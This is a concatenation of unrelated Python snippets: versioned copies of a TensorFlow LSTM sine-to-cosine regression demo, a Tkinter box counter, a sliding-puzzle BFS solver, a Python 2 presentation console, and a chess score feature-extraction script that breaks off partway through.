sess.run(tf.global_variables_initializer())\n plt.ion()\n plt.show()\n for i in range(200):\n seq, res, xs = get_batch()\n if i == 0:\n feed_dict = {model.xs: seq, model.ys: res}\n else:\n feed_dict = {model.xs: seq, model.ys: res, model.\n cell_init_state: state}\n _, cost, state, pred = sess.run([model.train_op, model.cost, model.\n cell_final_state, model.pred], feed_dict=feed_dict)\n plt.plot(xs[0, :], res[0].flatten(), 'r', xs[0, :], pred.flatten()[\n :TIME_STEPS], 'b--')\n plt.ylim((-1.2, 1.2))\n plt.draw()\n plt.pause(0.3)\n if i % 20 == 0:\n print('cost', round(cost, 4))\n result = sess.run(merged, feed_dict)\n writer.add_summary(result, i)\n",
"step-4": "import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nBATCH_START = 0\nTIME_STEPS = 20\nBATCH_SIZE = 50\nINPUT_SIZE = 1\nOUTPUT_SIZE = 1\nCELL_SIZE = 10\nLR = 0.006\n\n\ndef get_batch():\n global BATCH_START, TIME_STEPS\n xs = np.arange(BATCH_START, BATCH_START + TIME_STEPS * BATCH_SIZE).reshape(\n (BATCH_SIZE, TIME_STEPS)) / (10 * np.pi)\n seq = np.sin(xs)\n res = np.cos(xs)\n BATCH_START += TIME_STEPS\n return [seq[:, :, np.newaxis], res[:, :, np.newaxis], xs]\n\n\nclass LSTMRNN(object):\n\n def __init__(self, n_steps, input_size, output_size, cell_size, batch_size\n ):\n self.n_steps = n_steps\n self.input_size = input_size\n self.output_size = output_size\n self.cell_size = cell_size\n self.batch_size = batch_size\n with tf.name_scope('inputs'):\n self.xs = tf.placeholder(tf.float32, [None, n_steps, input_size\n ], name='xs')\n self.ys = tf.placeholder(tf.float32, [None, n_steps, input_size\n ], name='ys')\n with tf.variable_scope('in_hidden'):\n self.add_input_layer()\n with tf.variable_scope('LSTM_cell'):\n self.add_cell()\n with tf.variable_scope('out_hidden'):\n self.add_output_layer()\n with tf.name_scope('cost'):\n self.compute_cost()\n with tf.name_scope('train'):\n self.train_op = tf.train.AdamOptimizer(LR).minimize(self.cost)\n\n def add_input_layer(self):\n l_in_x = tf.reshape(self.xs, [-1, self.input_size], name='2_2D')\n Ws_in = self._weight_variable([self.input_size, self.cell_size])\n bs_in = self._bias_variable([self.cell_size])\n with tf.name_scope('Wx_plus_b'):\n l_in_y = tf.matmul(l_in_x, Ws_in) + bs_in\n self.l_in_y = tf.reshape(l_in_y, [-1, self.n_steps, self.cell_size],\n name='2_3D')\n\n def add_cell(self):\n lstm_cell = tf.contrib.rnn.BasicLSTMCell(self.cell_size,\n forget_bias=1.0, state_is_tuple=True)\n with tf.name_scope('initial_state'):\n self.cell_init_state = lstm_cell.zero_state(self.batch_size,\n dtype=tf.float32)\n self.cell_outputs, self.cell_final_state = tf.nn.dynamic_rnn(lstm_cell,\n self.l_in_y, initial_state=self.cell_init_state, time_major=False)\n\n def add_output_layer(self):\n l_out_x = tf.reshape(self.cell_outputs, [-1, self.cell_size], name=\n '2_2D')\n Ws_out = self._weight_variable([self.cell_size, self.output_size])\n bs_out = self._bias_variable([self.output_size])\n with tf.name_scope('Wx_plus_b'):\n self.pred = tf.matmul(l_out_x, Ws_out) + bs_out\n\n def compute_cost(self):\n losses = tf.contrib.legacy_seq2seq.sequence_loss_by_example([tf.\n reshape(self.pred, [-1], name='reshape_pred')], [tf.reshape(\n self.ys, [-1], name='reshape_target')], [tf.ones([self.\n batch_size * self.n_steps], dtype=tf.float32)],\n average_across_timesteps=True, softmax_loss_function=self.\n ms_error, name='losses')\n with tf.name_scope('average_cost'):\n self.cost = tf.div(tf.reduce_sum(losses, name='losses_sum'),\n self.batch_size, name='average_cost')\n tf.summary.scalar('cost', self.cost)\n\n @staticmethod\n def ms_error(labels, logits):\n return tf.square(tf.subtract(labels, logits))\n\n def _weight_variable(self, shape, name='weights'):\n initializer = tf.random_normal_initializer(mean=0.0, stddev=1.0)\n return tf.get_variable(shape=shape, initializer=initializer, name=name)\n\n def _bias_variable(self, shape, name='biases'):\n initializer = tf.constant_initializer(0.1)\n return tf.get_variable(shape=shape, initializer=initializer, name=name)\n\n\nif __name__ == '__main__':\n model = LSTMRNN(TIME_STEPS, INPUT_SIZE, OUTPUT_SIZE, CELL_SIZE, BATCH_SIZE)\n sess = tf.Session()\n merged = tf.summary.merge_all()\n writer = 
tf.summary.FileWriter('lstmlogs', sess.graph)\n sess.run(tf.global_variables_initializer())\n plt.ion()\n plt.show()\n for i in range(200):\n seq, res, xs = get_batch()\n if i == 0:\n feed_dict = {model.xs: seq, model.ys: res}\n else:\n feed_dict = {model.xs: seq, model.ys: res, model.\n cell_init_state: state}\n _, cost, state, pred = sess.run([model.train_op, model.cost, model.\n cell_final_state, model.pred], feed_dict=feed_dict)\n plt.plot(xs[0, :], res[0].flatten(), 'r', xs[0, :], pred.flatten()[\n :TIME_STEPS], 'b--')\n plt.ylim((-1.2, 1.2))\n plt.draw()\n plt.pause(0.3)\n if i % 20 == 0:\n print('cost', round(cost, 4))\n result = sess.run(merged, feed_dict)\n writer.add_summary(result, i)\n",
"step-5": "import tensorflow as tf\nimport numpy as np \nimport matplotlib.pyplot as plt\n\nBATCH_START=0\nTIME_STEPS=20\nBATCH_SIZE=50\nINPUT_SIZE=1\nOUTPUT_SIZE=1\nCELL_SIZE=10\nLR=0.006\n\n#generate data\ndef get_batch():\n global BATCH_START,TIME_STEPS\n xs=np.arange(BATCH_START,BATCH_START+TIME_STEPS*BATCH_SIZE).reshape((BATCH_SIZE,TIME_STEPS))/(10*np.pi)\n seq=np.sin(xs)\n res=np.cos(xs)\n #data move one\n BATCH_START+=TIME_STEPS\n # all return shape is (batch_size,time_step,input_size)\n return [seq[:,:,np.newaxis],res[:,:,np.newaxis],xs]\n\n#def RNN LSTM Structure\nclass LSTMRNN(object):\n def __init__(self,n_steps,input_size,output_size,cell_size,batch_size):\n self.n_steps=n_steps\n self.input_size=input_size\n self.output_size=output_size\n self.cell_size=cell_size\n self.batch_size=batch_size\n with tf.name_scope('inputs'):\n self.xs=tf.placeholder(tf.float32,[None,n_steps,input_size],name='xs')\n self.ys=tf.placeholder(tf.float32,[None,n_steps,input_size],name='ys')\n with tf.variable_scope('in_hidden'):\n self.add_input_layer()\n with tf.variable_scope('LSTM_cell'):\n self.add_cell()\n with tf.variable_scope('out_hidden'):\n self.add_output_layer()\n with tf.name_scope('cost'):\n self.compute_cost()\n with tf.name_scope('train'):\n self.train_op=tf.train.AdamOptimizer(LR).minimize(self.cost)\n \n#add input layer\n def add_input_layer(self):\n #shape(batch,step,input)=>(batch*step,input)\n l_in_x=tf.reshape(self.xs,[-1,self.input_size],name='2_2D')\n Ws_in=self._weight_variable([self.input_size,self.cell_size])\n bs_in=self._bias_variable([self.cell_size])\n with tf.name_scope('Wx_plus_b'):\n l_in_y=tf.matmul(l_in_x,Ws_in)+bs_in\n self.l_in_y=tf.reshape(l_in_y,[-1,self.n_steps,self.cell_size],name='2_3D')\n#add cell\n def add_cell(self):\n lstm_cell=tf.contrib.rnn.BasicLSTMCell(self.cell_size,forget_bias=1.0,state_is_tuple=True)\n with tf.name_scope('initial_state'):\n self.cell_init_state=lstm_cell.zero_state(self.batch_size,dtype=tf.float32)\n self.cell_outputs,self.cell_final_state=tf.nn.dynamic_rnn(lstm_cell,self.l_in_y,initial_state=self.cell_init_state,time_major=False)\n#add output layer\n def add_output_layer(self):\n l_out_x=tf.reshape(self.cell_outputs,[-1,self.cell_size],name='2_2D')\n Ws_out=self._weight_variable([self.cell_size,self.output_size])\n bs_out=self._bias_variable([self.output_size,])\n with tf.name_scope('Wx_plus_b'):\n self.pred=tf.matmul(l_out_x,Ws_out)+bs_out\n \n def compute_cost(self):\n losses=tf.contrib.legacy_seq2seq.sequence_loss_by_example(\n [tf.reshape(self.pred,[-1],name='reshape_pred')],\n [tf.reshape(self.ys,[-1],name='reshape_target')],\n [tf.ones([self.batch_size*self.n_steps],dtype=tf.float32)],\n average_across_timesteps=True,\n softmax_loss_function=self.ms_error,\n name='losses'\n )\n with tf.name_scope('average_cost'):\n self.cost=tf.div(\n tf.reduce_sum(losses,name='losses_sum'),\n self.batch_size,\n name='average_cost'\n )\n tf.summary.scalar('cost',self.cost)\n\n @staticmethod\n def ms_error(labels,logits):\n return tf.square(tf.subtract(labels,logits))\n def _weight_variable(self,shape,name='weights'):\n initializer=tf.random_normal_initializer(mean=0.,stddev=1.,)\n return tf.get_variable(shape=shape,initializer=initializer,name=name)\n \n def _bias_variable(self,shape,name='biases'):\n initializer=tf.constant_initializer(0.1)\n return tf.get_variable(shape=shape,initializer=initializer,name=name)\n\n#train\nif __name__=='__main__':\n model=LSTMRNN(TIME_STEPS,INPUT_SIZE,OUTPUT_SIZE,CELL_SIZE,BATCH_SIZE)\n sess=tf.Session()\n 
#merge for tensorboard\n merged=tf.summary.merge_all()\n writer=tf.summary.FileWriter(\"lstmlogs\",sess.graph)\n sess.run(tf.global_variables_initializer())\n\n #visiable\n plt.ion()\n plt.show()\n\n #train for 200\n for i in range(200):\n seq,res,xs=get_batch()\n if i==0:\n feed_dict={model.xs:seq,model.ys:res,} \n else:\n feed_dict={model.xs:seq,model.ys:res,model.cell_init_state:state}\n #train\n _,cost,state,pred=sess.run([model.train_op,model.cost,model.cell_final_state,model.pred],feed_dict=feed_dict)\n\n\n #plotting\n plt.plot(xs[0,:],res[0].flatten(),'r',xs[0,:],pred.flatten()[:TIME_STEPS],'b--')\n plt.ylim((-1.2,1.2))\n plt.draw()\n plt.pause(0.3)\n\n if i%20==0:\n # 4 \n print('cost',round(cost,4))\n result=sess.run(merged,feed_dict)\n writer.add_summary(result,i)\n\n\n\n\n\n\n\n",
"step-ids": [
8,
11,
12,
13,
14
]
}
|
[
8,
11,
12,
13,
14
] |
from tkinter import *
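# Box-counting GUI: P, M and G count small, medium and large boxes; en gates redrawing the button row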
global P,M,G,en
P=0
M=0
G=0
en=1
def inicio():
global P,M,G,en
B1=Button(ventana,text="CAJAS PEQUEÑAS",command=A,state="normal",bg="yellow").grid(column=1,row=1)
B2=Button(ventana,text="CAJAS MEDIANAS",command=B,state="normal",bg="orange").grid(column=2,row=1)
B3=Button(ventana,text="CAJAS GRANDES",command=C,state="normal",bg="red").grid(column=3,row=1)
B4=Button(ventana,text="TOTAL DE CAJAS",command=D,state="normal",bg="green").grid(column=4,row=1)
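# Each click handler increments the counter for its box size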
def A ():
global P
P=P+1
def B ():
global M
M=M+1
def C ():
global G
G=G+1
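# D shows the per-size totals and the grand total, then redraws the button row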
def D ():
global P,M,G
l=Label(ventana,text="El total de CAJAS PEQUEÑAS es:"+str(P)).grid(column=0,row=2)
l=Label(ventana,text="El total de CAJAS MEDIANAS es:"+str(M)).grid(column=0,row=3)
l=Label(ventana,text="El total de CAJAS GRANDES es:"+str(G)).grid(column=0,row=4)
l=Label(ventana,text="EL TOTAL DE CAJAS CONTADAS ES:"+str(P+M+G)).grid(column=0,row=5)
if(en==1):
inicio()
ventana=Tk()
inicio()
ventana.mainloop()
|
normal
|
{
"blob_id": "393af07fa7a5c265dbdd3047ef33a77130edf259",
"index": 1915,
"step-1": "<mask token>\n\n\ndef inicio():\n global P, M, G, en\n B1 = Button(ventana, text='CAJAS PEQUEÑAS', command=A, state='normal',\n bg='yellow').grid(column=1, row=1)\n B2 = Button(ventana, text='CAJAS MEDIANAS', command=B, state='normal',\n bg='orange').grid(column=2, row=1)\n B3 = Button(ventana, text='CAJAS GRANDES', command=C, state='normal',\n bg='red').grid(column=3, row=1)\n B4 = Button(ventana, text='TOTAL DE CAJAS', command=D, state='normal',\n bg='green').grid(column=4, row=1)\n\n\ndef A():\n global P\n P = P + 1\n\n\ndef B():\n global M\n M = M + 1\n\n\ndef C():\n global G\n G = G + 1\n\n\ndef D():\n global P, M, G\n l = Label(ventana, text='El total de CAJAS PEQUEÑAS es:' + str(P)).grid(\n column=0, row=2)\n l = Label(ventana, text='El total de CAJAS MEDIANAS es:' + str(M)).grid(\n column=0, row=3)\n l = Label(ventana, text='El total de CAJAS GRANDES es:' + str(G)).grid(\n column=0, row=4)\n l = Label(ventana, text='EL TOTAL DE CAJAS CONTADAS ES:' + str(P + M + G)\n ).grid(column=0, row=5)\n if en == 1:\n inicio()\n\n\n<mask token>\n",
"step-2": "<mask token>\nglobal P, M, G, en\n<mask token>\n\n\ndef inicio():\n global P, M, G, en\n B1 = Button(ventana, text='CAJAS PEQUEÑAS', command=A, state='normal',\n bg='yellow').grid(column=1, row=1)\n B2 = Button(ventana, text='CAJAS MEDIANAS', command=B, state='normal',\n bg='orange').grid(column=2, row=1)\n B3 = Button(ventana, text='CAJAS GRANDES', command=C, state='normal',\n bg='red').grid(column=3, row=1)\n B4 = Button(ventana, text='TOTAL DE CAJAS', command=D, state='normal',\n bg='green').grid(column=4, row=1)\n\n\ndef A():\n global P\n P = P + 1\n\n\ndef B():\n global M\n M = M + 1\n\n\ndef C():\n global G\n G = G + 1\n\n\ndef D():\n global P, M, G\n l = Label(ventana, text='El total de CAJAS PEQUEÑAS es:' + str(P)).grid(\n column=0, row=2)\n l = Label(ventana, text='El total de CAJAS MEDIANAS es:' + str(M)).grid(\n column=0, row=3)\n l = Label(ventana, text='El total de CAJAS GRANDES es:' + str(G)).grid(\n column=0, row=4)\n l = Label(ventana, text='EL TOTAL DE CAJAS CONTADAS ES:' + str(P + M + G)\n ).grid(column=0, row=5)\n if en == 1:\n inicio()\n\n\n<mask token>\ninicio()\nventana.mainloop()\n",
"step-3": "<mask token>\nglobal P, M, G, en\nP = 0\nM = 0\nG = 0\nen = 1\n\n\ndef inicio():\n global P, M, G, en\n B1 = Button(ventana, text='CAJAS PEQUEÑAS', command=A, state='normal',\n bg='yellow').grid(column=1, row=1)\n B2 = Button(ventana, text='CAJAS MEDIANAS', command=B, state='normal',\n bg='orange').grid(column=2, row=1)\n B3 = Button(ventana, text='CAJAS GRANDES', command=C, state='normal',\n bg='red').grid(column=3, row=1)\n B4 = Button(ventana, text='TOTAL DE CAJAS', command=D, state='normal',\n bg='green').grid(column=4, row=1)\n\n\ndef A():\n global P\n P = P + 1\n\n\ndef B():\n global M\n M = M + 1\n\n\ndef C():\n global G\n G = G + 1\n\n\ndef D():\n global P, M, G\n l = Label(ventana, text='El total de CAJAS PEQUEÑAS es:' + str(P)).grid(\n column=0, row=2)\n l = Label(ventana, text='El total de CAJAS MEDIANAS es:' + str(M)).grid(\n column=0, row=3)\n l = Label(ventana, text='El total de CAJAS GRANDES es:' + str(G)).grid(\n column=0, row=4)\n l = Label(ventana, text='EL TOTAL DE CAJAS CONTADAS ES:' + str(P + M + G)\n ).grid(column=0, row=5)\n if en == 1:\n inicio()\n\n\nventana = Tk()\ninicio()\nventana.mainloop()\n",
"step-4": "from tkinter import *\nglobal P, M, G, en\nP = 0\nM = 0\nG = 0\nen = 1\n\n\ndef inicio():\n global P, M, G, en\n B1 = Button(ventana, text='CAJAS PEQUEÑAS', command=A, state='normal',\n bg='yellow').grid(column=1, row=1)\n B2 = Button(ventana, text='CAJAS MEDIANAS', command=B, state='normal',\n bg='orange').grid(column=2, row=1)\n B3 = Button(ventana, text='CAJAS GRANDES', command=C, state='normal',\n bg='red').grid(column=3, row=1)\n B4 = Button(ventana, text='TOTAL DE CAJAS', command=D, state='normal',\n bg='green').grid(column=4, row=1)\n\n\ndef A():\n global P\n P = P + 1\n\n\ndef B():\n global M\n M = M + 1\n\n\ndef C():\n global G\n G = G + 1\n\n\ndef D():\n global P, M, G\n l = Label(ventana, text='El total de CAJAS PEQUEÑAS es:' + str(P)).grid(\n column=0, row=2)\n l = Label(ventana, text='El total de CAJAS MEDIANAS es:' + str(M)).grid(\n column=0, row=3)\n l = Label(ventana, text='El total de CAJAS GRANDES es:' + str(G)).grid(\n column=0, row=4)\n l = Label(ventana, text='EL TOTAL DE CAJAS CONTADAS ES:' + str(P + M + G)\n ).grid(column=0, row=5)\n if en == 1:\n inicio()\n\n\nventana = Tk()\ninicio()\nventana.mainloop()\n",
"step-5": "from tkinter import *\r\nglobal P,M,G,en\r\nP=0\r\nM=0\r\nG=0\r\nen=1\r\ndef inicio():\r\n global P,M,G,en\r\n \r\n B1=Button(ventana,text=\"CAJAS PEQUEÑAS\",command=A,state=\"normal\",bg=\"yellow\").grid(column=1,row=1)\r\n B2=Button(ventana,text=\"CAJAS MEDIANAS\",command=B,state=\"normal\",bg=\"orange\").grid(column=2,row=1)\r\n B3=Button(ventana,text=\"CAJAS GRANDES\",command=C,state=\"normal\",bg=\"red\").grid(column=3,row=1)\r\n B4=Button(ventana,text=\"TOTAL DE CAJAS\",command=D,state=\"normal\",bg=\"green\").grid(column=4,row=1)\r\n \r\n\r\ndef A ():\r\n global P\r\n P=P+1\r\ndef B ():\r\n global M\r\n M=M+1\r\ndef C ():\r\n global G\r\n G=G+1\r\ndef D ():\r\n global P,M,G\r\n l=Label(ventana,text=\"El total de CAJAS PEQUEÑAS es:\"+str(P)).grid(column=0,row=2) \r\n l=Label(ventana,text=\"El total de CAJAS MEDIANAS es:\"+str(M)).grid(column=0,row=3)\r\n l=Label(ventana,text=\"El total de CAJAS GRANDES es:\"+str(G)).grid(column=0,row=4)\r\n l=Label(ventana,text=\"EL TOTAL DE CAJAS CONTADAS ES:\"+str(P+M+G)).grid(column=0,row=5)\r\n\r\n \r\n if(en==1):\r\n inicio()\r\n\r\n \r\nventana=Tk()\r\ninicio()\r\nventana.mainloop()\r\n\r\n\r\n\r\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
from collections import deque
from typing import List
class Solution:
def slidingPuzzle(self, board: List[List[int]]) -> int:
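        # Encode the 2x3 board as a 6-character string so states can be hashed and compared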
def board2str(board: List[List[int]]) -> str:
return ''.join([str(board[i][j]) for i in range(2) for j in range(3)])
start = board2str(board)
bfs = deque([(start, 0)])
visited = {start}
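        # BFS from the start state; the first time "123450" is dequeued, step is the minimum move count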
while bfs:
path, step = bfs.popleft()
if path == "123450": return step
p = path.index("0")
x, y = p // 3, p % 3
path = list(path)
for nx, ny in [(0, 1), (1, 0), (0, -1), (-1, 0)]:
tx, ty = x + nx, y + ny
if tx < 0 or tx >= 2 or ty < 0 or ty >= 3: continue
path[tx * 3 + ty], path[x * 3 + y] = path[x * 3 + y], path[tx * 3 + ty]
path_str = "".join(path)
if path_str not in visited:
bfs.append((path_str, step + 1))
visited.add(path_str)
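                # Undo the swap so the next direction starts from the current state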
path[tx * 3 + ty], path[x * 3 + y] = path[x * 3 + y], path[tx * 3 + ty]
return -1
|
normal
|
{
"blob_id": "dc934f8db4e0c1113e1398b051b58369d909fff8",
"index": 6471,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def slidingPuzzle(self, board: List[List[int]]) ->int:\n\n def board2str(board: List[List[int]]) ->str:\n return ''.join([str(board[i][j]) for i in range(2) for j in\n range(3)])\n start = board2str(board)\n bfs = deque([(start, 0)])\n visited = {start}\n while bfs:\n path, step = bfs.popleft()\n if path == '123450':\n return step\n p = path.index('0')\n x, y = p // 3, p % 3\n path = list(path)\n for nx, ny in [(0, 1), (1, 0), (0, -1), (-1, 0)]:\n tx, ty = x + nx, y + ny\n if tx < 0 or tx >= 2 or ty < 0 or ty >= 3:\n continue\n path[tx * 3 + ty], path[x * 3 + y] = path[x * 3 + y], path[\n tx * 3 + ty]\n path_str = ''.join(path)\n if path_str not in visited:\n bfs.append((path_str, step + 1))\n visited.add(path_str)\n path[tx * 3 + ty], path[x * 3 + y] = path[x * 3 + y], path[\n tx * 3 + ty]\n return -1\n",
"step-4": "from collections import deque\n\n\nclass Solution:\n\n def slidingPuzzle(self, board: List[List[int]]) ->int:\n\n def board2str(board: List[List[int]]) ->str:\n return ''.join([str(board[i][j]) for i in range(2) for j in\n range(3)])\n start = board2str(board)\n bfs = deque([(start, 0)])\n visited = {start}\n while bfs:\n path, step = bfs.popleft()\n if path == '123450':\n return step\n p = path.index('0')\n x, y = p // 3, p % 3\n path = list(path)\n for nx, ny in [(0, 1), (1, 0), (0, -1), (-1, 0)]:\n tx, ty = x + nx, y + ny\n if tx < 0 or tx >= 2 or ty < 0 or ty >= 3:\n continue\n path[tx * 3 + ty], path[x * 3 + y] = path[x * 3 + y], path[\n tx * 3 + ty]\n path_str = ''.join(path)\n if path_str not in visited:\n bfs.append((path_str, step + 1))\n visited.add(path_str)\n path[tx * 3 + ty], path[x * 3 + y] = path[x * 3 + y], path[\n tx * 3 + ty]\n return -1\n",
"step-5": "from collections import deque\n\n\nclass Solution:\n def slidingPuzzle(self, board: List[List[int]]) -> int:\n def board2str(board: List[List[int]]) -> str:\n return ''.join([str(board[i][j]) for i in range(2) for j in range(3)])\n\n start = board2str(board)\n bfs = deque([(start, 0)])\n visited = {start}\n\n while bfs:\n path, step = bfs.popleft()\n\n if path == \"123450\": return step\n\n p = path.index(\"0\")\n\n x, y = p // 3, p % 3\n\n path = list(path)\n\n for nx, ny in [(0, 1), (1, 0), (0, -1), (-1, 0)]:\n tx, ty = x + nx, y + ny\n\n if tx < 0 or tx >= 2 or ty < 0 or ty >= 3: continue\n\n path[tx * 3 + ty], path[x * 3 + y] = path[x * 3 + y], path[tx * 3 + ty]\n\n path_str = \"\".join(path)\n if path_str not in visited:\n bfs.append((path_str, step + 1))\n visited.add(path_str)\n\n path[tx * 3 + ty], path[x * 3 + y] = path[x * 3 + y], path[tx * 3 + ty]\n\n return -1\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# presentation console
# - a python interpreter for "pseudo-interactive" demos
#
# usage: $ python prescons.py <filename>
#
# <filename> should be a file that contains python code as would be entered
# directly in a terminal - see example.py
#
# while running, press 'space' to move through the code
#
# github.com/inglesp/prescons
from code import InteractiveConsole
from StringIO import StringIO
import sys, termios, tty
# get character from stdin
# based on http://code.activestate.com/recipes/134892/
# *nix only, and doesn't handle arrow keys well
def getch(ch=None):
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
while True:
tty.setraw(fd)
gotch = sys.stdin.read(1)
if ch is None or gotch == ch:
break
if ord(gotch) == 3:
raise KeyboardInterrupt
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
# subclasses InteractiveConsole from code module
class PresentationConsole(InteractiveConsole):
def __init__(self, path):
self.file = open(path)
InteractiveConsole.__init__(self)
def raw_input(self, prompt=''):
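        # Echo the prompt; at the primary prompt, wait for a space keypress, then feed the next line from the script file as if typed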
self.write(prompt)
if prompt == sys.ps1:
try:
getch(' ')
except KeyboardInterrupt:
print "KeyboardInterrupt"
exec "import ipdb; ipdb.set_trace()" in self.locals
line = self.file.readline()
if len(line) == 0:
self.file.close()
raise EOFError
self.write(line)
return line.rstrip()
def runcode(self, code):
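        # Capture stdout while the code runs; if there is output, wait for a space keypress before displaying it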
sys.stdout = StringIO()
InteractiveConsole.runcode(self, code)
output = sys.stdout.getvalue()
sys.stdout = sys.__stdout__
if len(output) > 0:
getch(' ')
self.write(output)
if __name__ == '__main__':
path = sys.argv[1]
console = PresentationConsole(path)
console.interact()
|
normal
|
{
"blob_id": "fa531e8b07de6ee3c22146904ee8724cefab9033",
"index": 2732,
"step-1": "# presentation console\n# - a python interpreter for \"pseudo-interative\" demos\n#\n# usage: $ python prescons.py <filename>\n#\n# <filename> should be a file that contains python code as would be entered\n# directly in a terminal - see example.py\n#\n# while running, press 'space' to move through the code\n#\n# github.com/inglesp/prescons\n\nfrom code import InteractiveConsole\nfrom StringIO import StringIO\nimport sys, termios, tty\n\n# get character from stdin\n# based on http://code.activestate.com/recipes/134892/\n# *nix only, and doesn't handle arrow keys well\ndef getch(ch=None):\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n while True:\n tty.setraw(fd)\n gotch = sys.stdin.read(1)\n if ch is None or gotch == ch:\n break\n if ord(gotch) == 3:\n raise KeyboardInterrupt\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n\n# subclasses InteractiveConsole from code module\nclass PresentationConsole(InteractiveConsole):\n def __init__(self, path):\n self.file = open(path)\n InteractiveConsole.__init__(self)\n\n def raw_input(self, prompt=''):\n self.write(prompt)\n if prompt == sys.ps1:\n try:\n getch(' ')\n except KeyboardInterrupt:\n print \"KeyboardInterrupt\"\n exec \"import ipdb; ipdb.set_trace()\" in self.locals\n line = self.file.readline()\n if len(line) == 0:\n self.file.close()\n raise EOFError\n self.write(line)\n return line.rstrip()\n\n def runcode(self, code):\n sys.stdout = StringIO()\n InteractiveConsole.runcode(self, code)\n output = sys.stdout.getvalue()\n sys.stdout = sys.__stdout__\n if len(output) > 0:\n getch(' ')\n self.write(output)\n\nif __name__ == '__main__':\n path = sys.argv[1]\n console = PresentationConsole(path)\n console.interact()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#Script to extract features from chess score data file stockfish.csv
import numpy as np
import pandas as pd
#Load in and format raw chess game scoring data
raw_scores = [line.strip().split(",")[1].split() for line in open("stockfish.csv")][1:]
#Initialize containers for features to extract
game_length = []
average_score = []
score_stdev = []
largest_gain = []
largest_drop = []
max_score = []
min_score = []
ending_score = []
white_avg_improve = []
black_avg_improve = []
white_median_improve = []
black_median_improve = []
white_q1_improve =[]
white_q2_improve =[]
white_q3_improve =[]
white_q4_improve =[]
black_q1_improve =[]
black_q2_improve =[]
black_q3_improve =[]
black_q4_improve =[]
game_score10 = []
game_score20 = []
game_score30 = []
game_score40 = []
game_score50 = []
game_score60 = []
game_score70 = []
game_score80 = []
game_score90 = []
game_score100 = []
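#Per-quarter max, min and standard deviation of move-to-move score changes for each player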
white_q1_max =[]
white_q2_max =[]
white_q3_max =[]
white_q4_max =[]
black_q1_max =[]
black_q2_max =[]
black_q3_max =[]
black_q4_max =[]
white_q1_min =[]
white_q2_min =[]
white_q3_min =[]
white_q4_min =[]
black_q1_min =[]
black_q2_min =[]
black_q3_min =[]
black_q4_min =[]
white_q1_stdev =[]
white_q2_stdev =[]
white_q3_stdev =[]
white_q4_stdev =[]
black_q1_stdev =[]
black_q2_stdev =[]
black_q3_stdev =[]
black_q4_stdev =[]
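#Average score change over successive 5-move windows for each player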
white_5_improve = []
white_10_improve = []
white_15_improve = []
white_20_improve = []
white_25_improve = []
white_30_improve = []
white_35_improve = []
white_40_improve = []
white_45_improve = []
white_50_improve = []
white_55_improve = []
white_60_improve = []
white_65_improve = []
white_70_improve = []
white_75_improve = []
black_5_improve = []
black_10_improve = []
black_15_improve = []
black_20_improve = []
black_25_improve = []
black_30_improve = []
black_35_improve = []
black_40_improve = []
black_45_improve = []
black_50_improve = []
black_55_improve = []
black_60_improve = []
black_65_improve = []
black_70_improve = []
black_75_improve = []
#Loop through game data, calculate and append new features to feature containers
for game in raw_scores:
game_len = len(game)+1 # Add 1 to game length to avoid divide by zero errors caused by empty games
total = 0
prev = None
player = 1
max_so_far = -100
min_so_far = 100
max_drop = 0
max_gain = 0
white_improve = [0]
black_improve = [0]
game_nums = [0]
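    #Walk the per-ply scores, tracking the running total, extremes and each player's move-to-move change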
for score in game:
if score != "NA":
score = int(score)
game_nums.append(score)
total+=score
if prev != None:
change = score - prev
if change < max_drop:
max_drop = change
if change > max_gain:
max_gain = change
if player == 1:
black_improve.append(change)
else:
white_improve.append(change)
player = abs(player-1)
prev = score
if score > max_so_far:
max_so_far = score
if score < min_so_far:
min_so_far = score
#Add computed values to feature containers
white_avg = sum(white_improve)/(game_len/2)
black_avg = sum(black_improve)/(game_len/2)
game_length.append(game_len)
average_score.append(total/game_len)
score_stdev.append(np.std(np.array(game_nums)))
largest_gain.append(max_gain)
largest_drop.append(max_drop)
max_score.append(max_so_far)
min_score.append(min_so_far)
white_avg_improve.append(white_avg)
black_avg_improve.append(black_avg)
white_median_improve.append(sorted(white_improve)[len(white_improve)//2])
black_median_improve.append(sorted(black_improve)[len(black_improve)//2])
white_q1_improve.append( sum(white_improve[0:len(white_improve)//4])/len(white_improve)//4 )
white_q2_improve.append( sum(white_improve[len(white_improve)//4 : (len(white_improve)//4)*2])/len(white_improve)//4 )
white_q3_improve.append( sum(white_improve[(len(white_improve)//4)*2 : (len(white_improve)//4)*3])/len(white_improve)//4 )
white_q4_improve.append( sum(white_improve[(len(white_improve)//4)*3 : ])/len(white_improve)//4 )
black_q1_improve.append( sum(black_improve[0:len(black_improve)//4])/len(black_improve)//4 )
black_q2_improve.append( sum(black_improve[len(black_improve)//4 : (len(black_improve)//4)*2])/len(black_improve)//4 )
black_q3_improve.append( sum(black_improve[(len(black_improve)//4)*2 : (len(black_improve)//4)*3])/len(black_improve)//4 )
black_q4_improve.append( sum(black_improve[(len(black_improve)//4)*3 : ])/len(black_improve)//4 )
white_q1_max.append(max(white_improve[0:1+len(white_improve)//4]))
white_q2_max.append(max(white_improve[len(white_improve)//4 : 1+(len(white_improve)//4)*2]))
white_q3_max.append(max(white_improve[(len(white_improve)//4)*2 : 1+(len(white_improve)//4)*3]))
white_q4_max.append(max(white_improve[(len(white_improve)//4)*3 : ]))
black_q1_max.append(max(black_improve[0:1+len(black_improve)//4]))
black_q2_max.append(max(black_improve[len(black_improve)//4 : 1+(len(black_improve)//4)*2]))
black_q3_max.append(max(black_improve[(len(black_improve)//4)*2 : 1+(len(black_improve)//4)*3]))
black_q4_max.append(max(black_improve[(len(black_improve)//4)*3 : ]))
white_q1_min.append(min(white_improve[0:1+len(white_improve)//4]))
white_q2_min.append(min(white_improve[len(white_improve)//4 : 1+(len(white_improve)//4)*2]))
white_q3_min.append(min(white_improve[(len(white_improve)//4)*2 : 1+(len(white_improve)//4)*3]))
